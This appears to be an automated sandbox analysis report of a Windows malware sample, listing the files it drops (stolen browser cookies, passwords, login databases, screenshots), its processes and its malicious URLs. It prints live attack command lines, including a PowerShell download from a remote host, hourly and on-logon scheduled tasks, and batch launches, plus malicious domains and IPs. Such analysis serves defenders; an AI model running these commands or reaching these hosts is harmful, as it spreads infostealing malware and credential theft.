C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\crypted[1].bmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\crypted[2].bmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\offerv5[1].bmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\ping[1].htm
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cap_20240426132115[1].bmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\file[1].bmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\load[1].bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Mind
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Orders
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Origins
ASCII text, with very long lines (1249), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Origins.cmd (copy)
ASCII text, with very long lines (1249), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Titten
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Towards
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Weather
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\7zS1122.tmp\__data__\config.txt
data
dropped
C:\Users\user\AppData\Local\Temp\Extension\background.js
C source, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Extension\js\content.js
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Extension\js\injected-script.js
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Extension\manifest.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\Tmp4B5D.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\Tmp4C38.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tkba0wk.xyk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hluer5q4.cqm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\adobe4UoSaJ1HvcMQ\Cookies\Chrome_Default.txt
ASCII text, with very long lines (369), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\adobe4UoSaJ1HvcMQ\History\Firefox_v6zchhhv.default-release.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\adobe4UoSaJ1HvcMQ\information.txt
ASCII text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Local\Temp\adobe4UoSaJ1HvcMQ\passwords.txt
Unicode text, UTF-8 text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Local\Temp\adobe4UoSaJ1HvcMQ\screenshot.png
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\adobebNPjSTVLcfU9\Cookies\Chrome_Default.txt
ASCII text, with very long lines (369), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\adobebNPjSTVLcfU9\History\Firefox_v6zchhhv.default-release.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\adobebNPjSTVLcfU9\information.txt
ASCII text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Local\Temp\adobebNPjSTVLcfU9\passwords.txt
Unicode text, UTF-8 text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Local\Temp\adobebNPjSTVLcfU9\screenshot.png
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\02zdBXl47cvzcookies.sqlite
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\2zP1G8p1iQJjLogin Data For Account
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\3b6N2Xdh3CYwplaces.sqlite
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\64EhBK9pPEejWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\D87fZN3R3jFeplaces.sqlite
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\GUqbTj6a3aeuWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\VX47wOi5IdsoHistory
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\VxQNd6PjxQ4IWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\c9Ke919FucYfLogin Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\ePTJdgtQYR0ZWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\fXcmNJoV2iX7History
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\jKgQYUDI432NWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\mt7OCzoe5EiXHistory
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\nQfPDBSO_zhhLogin Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\ozCZFZcX7KzPHistory
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\qZ19CGM8hwxkCookies
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\rX_2ZxJOIcMDWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
dropped
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\xy2WaeNGr_weCookies
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\02zdBXl47cvzcookies.sqlite
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\3b6N2Xdh3CYwplaces.sqlite
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\6T2hrY_59kabWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\D87fZN3R3jFeplaces.sqlite
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\KRMNVjFRi4j_Web Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\KwtYJLwiw1XSWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\OX6r5kFE4_5wLogin Data For Account
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\OjEnjJ2fk51TCookies
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\RPnUW9g6xcXUHistory
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\TLKMvYDr7UggHistory
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\g1nPtTkLUZCiLogin Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\lyYuMhcYEXW3Web Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\nDLFKfwPjqj8Login Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\oalOadMQFJP1History
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\qNi0IJQWfY4DCookies
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\xRys8z4g2oAhHistory
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\ySS0zEBg9EcgWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\ykKwdMW50uxuWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
dropped
C:\Users\user\AppData\Local\Temp\is-DR9JS.tmp\_isetup\_shfoldr.dll
PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\nsb11FE.tmp\lood.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\rage131MP.tmp
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\02zdBXl47cvzcookies.sqlite
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\0lmvb14SPRr1Web Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\3b6N2Xdh3CYwplaces.sqlite
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\5C6pMB2SG4AJWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\7GA2IlW0UuJgCookies
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\CGk_EanznKg9Login Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\D87fZN3R3jFeplaces.sqlite
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\Nn5EcBvMxvojLogin Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\YQIcZS5bbgY3Web Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\aafhhrERnzL_Login Data For Account
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\amRigyhNQLEUHistory
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\em5JR7dGKUrNHistory
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\fa1ELUpehyhwWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\kSUIz5XtgW_yWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\lf0Ci8qJVN6_History
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\oUlup8JybxFvCookies
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\quf_9r_kKdtiHistory
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\spanlGcoWSIeDh3x\ywqHlsd8aAIPWeb Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Local\Temp\tmpSTLpopstart\stlmapfrog
data
dropped
C:\Users\user\AppData\Local\Temp\trixylGcoWSIeDh3x\Cookies\Chrome_Default.txt
ASCII text, with very long lines (369), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\trixylGcoWSIeDh3x\information.txt
ASCII text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Local\Temp\trixylGcoWSIeDh3x\passwords.txt
Unicode text, UTF-8 text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 12:40:12 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Wed Oct 4 12:34:48 2023, atime=Fri Sep 29 11:17:35 2023, length=4210216, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 09:48:42 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Hidden, Archive, ctime=Sun Mar 31 17:31:13 2024, mtime=Sun Mar 31 17:31:13 2024, atime=Sun Mar 31 17:30:16 2024, length=5857792, window=hide
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
data
dropped
C:\Users\user\Documents\SimpleAdobe\UfUCzZyythND5Mlv0AfisYU7.exe
HTML document, ASCII text
dropped
C:\Users\user\Documents\SimpleAdobe\fxTwuaiM2BNoe0MqlJE9x0ib.exe
HTML document, ASCII text, with very long lines (6927)
dropped
C:\Users\user\Documents\SimpleAdobe\orqBzQUd__kpFtFbjy6wKpkD.exe
HTML document, ASCII text, with very long lines (6927)
dropped
C:\Windows\Logs\StorGroupPolicy.log
data
modified
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
RAGE Package Format (RPF),
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
There are 299 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\file.exe
"C:\Users\user\Desktop\file.exe"
 malicious
C:\Users\user\Documents\SimpleAdobe\Ei_CrZ0hX5IpZO6M8vmf9YQM.exe
C:\Users\user\Documents\SimpleAdobe\Ei_CrZ0hX5IpZO6M8vmf9YQM.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\N5xV60nTuv_yHhVQbuCWtSAa.exe
C:\Users\user\Documents\SimpleAdobe\N5xV60nTuv_yHhVQbuCWtSAa.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\jyvJiQ5G7FQWGOiZZtnZarsG.exe
C:\Users\user\Documents\SimpleAdobe\jyvJiQ5G7FQWGOiZZtnZarsG.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\Lxw7uf_bmAos3kuSR2kfSqFW.exe
C:\Users\user\Documents\SimpleAdobe\Lxw7uf_bmAos3kuSR2kfSqFW.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\KwhvBh9hxs5lQ5lOIYMJQFx5.exe
C:\Users\user\Documents\SimpleAdobe\KwhvBh9hxs5lQ5lOIYMJQFx5.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\7c7wJeWsbxc9A0S_EEI7N6oJ.exe
C:\Users\user\Documents\SimpleAdobe\7c7wJeWsbxc9A0S_EEI7N6oJ.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\Y7icxeTf_mYHbGUrKS_BgwN8.exe
C:\Users\user\Documents\SimpleAdobe\Y7icxeTf_mYHbGUrKS_BgwN8.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\7j4wLhTAPWixkZaNy5LyWW9f.exe
C:\Users\user\Documents\SimpleAdobe\7j4wLhTAPWixkZaNy5LyWW9f.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\BjUQmnyU29WChWiYuF77nv8F.exe
C:\Users\user\Documents\SimpleAdobe\BjUQmnyU29WChWiYuF77nv8F.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\3F1X4UE0cq9uqeL1QtwwpozI.exe
C:\Users\user\Documents\SimpleAdobe\3F1X4UE0cq9uqeL1QtwwpozI.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\8mBlkncAH7snK4fRC6yj2oG4.exe
C:\Users\user\Documents\SimpleAdobe\8mBlkncAH7snK4fRC6yj2oG4.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\IOjjrEgGTt3zhAMwmB54wMWH.exe
C:\Users\user\Documents\SimpleAdobe\IOjjrEgGTt3zhAMwmB54wMWH.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\DadhSaLOdUdE4LumiIWccpnB.exe
C:\Users\user\Documents\SimpleAdobe\DadhSaLOdUdE4LumiIWccpnB.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\8YA903yCU9af_VvvQGvDN1bN.exe
C:\Users\user\Documents\SimpleAdobe\8YA903yCU9af_VvvQGvDN1bN.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\oVDijaSg43uhdsVFv6YSiRRb.exe
C:\Users\user\Documents\SimpleAdobe\oVDijaSg43uhdsVFv6YSiRRb.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\IapQulW8JeYr48nijMVQxnzk.exe
C:\Users\user\Documents\SimpleAdobe\IapQulW8JeYr48nijMVQxnzk.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\nDqH9YCkRTWfdia7q4yWroCs.exe
C:\Users\user\Documents\SimpleAdobe\nDqH9YCkRTWfdia7q4yWroCs.exe
 malicious
C:\Users\user\Documents\SimpleAdobe\NWxEXGU4JfiAdgC6cb7PXiGW.exe
C:\Users\user\Documents\SimpleAdobe\NWxEXGU4JfiAdgC6cb7PXiGW.exe
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Users\user\Documents\SimpleAdobe\BsTMunYiHDsPU7Zl0yLK_TV5.exe
C:\Users\user\Documents\SimpleAdobe\BsTMunYiHDsPU7Zl0yLK_TV5.exe
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit
 malicious
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\user\AppData\Local\Temp\nsb11FE.tmp\lood.bat"
 malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?c={CHANNEL}','stat')"
 malicious
C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
 malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
 malicious
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4208 -ip 4208
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 728
C:\Users\user\AppData\Local\Temp\7zS1122.tmp\Install.exe
.\Install.exe
C:\Users\user\AppData\Local\Temp\is-L76CN.tmp\Lxw7uf_bmAos3kuSR2kfSqFW.tmp
"C:\Users\user\AppData\Local\Temp\is-L76CN.tmp\Lxw7uf_bmAos3kuSR2kfSqFW.tmp" /SL5="$10470,4294809,54272,C:\Users\user\Documents\SimpleAdobe\Lxw7uf_bmAos3kuSR2kfSqFW.exe"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4208 -ip 4208
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 736
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 34 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://steamcommunity.com/profiles/76561199680449169
malicious
demonstationfukewko.shop
malicious
http://185.172.128.151/
unknown
 malicious
greetclassifytalk.shop
malicious
shortsvelventysjo.shop
malicious
https://duckduckgo.com/chrome_newtab
unknown
https://duckduckgo.com/ac/?q=
unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j
unknown
https://95.217.242.142/vcruntime140.dll
unknown
https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exe~p
unknown
